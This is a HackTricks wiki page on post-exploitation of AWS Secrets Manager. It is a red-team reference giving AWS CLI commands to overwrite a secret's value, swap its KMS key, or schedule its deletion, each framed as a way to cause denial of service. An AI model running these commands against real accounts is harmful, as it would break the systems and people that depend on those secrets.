Skip to content

Latest commit

 

History

History
74 lines (50 loc) · 3.51 KB

aws-secrets-manager-post-exploitation.md

File metadata and controls

74 lines (50 loc) · 3.51 KB

AWS - Secrets Manager Post Exploitation

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Secrets Manager

For more information check:

{% content-ref url="../../aws-security/aws-services/aws-secrets-manager-enum.md" %} aws-secrets-manager-enum.md {% endcontent-ref %}

Read Secrets

The secrets themself are sensitive information, check the privesc page to learn how to read them.

DoS Change Secret Value

Changing the value of the secret you could DoS all the system that depends on that value.

{% hint style="warning" %} Note that previous values are also stored, so it's easy to just go back to the previous value. {% endhint %}

# Requires permission secretsmanager:PutSecretValue
aws secretsmanager put-secret-value \
    --secret-id MyTestSecret \
    --secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}"

DoS Change KMS key

aws secretsmanager update-secret \
    --secret-id MyTestSecret \
    --kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE

DoS Deleting Secret

The minimun num of days to delete a secret are 7

aws secretsmanager delete-secret \
    --secret-id MyTestSecret \
    --recovery-window-in-days 7
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks: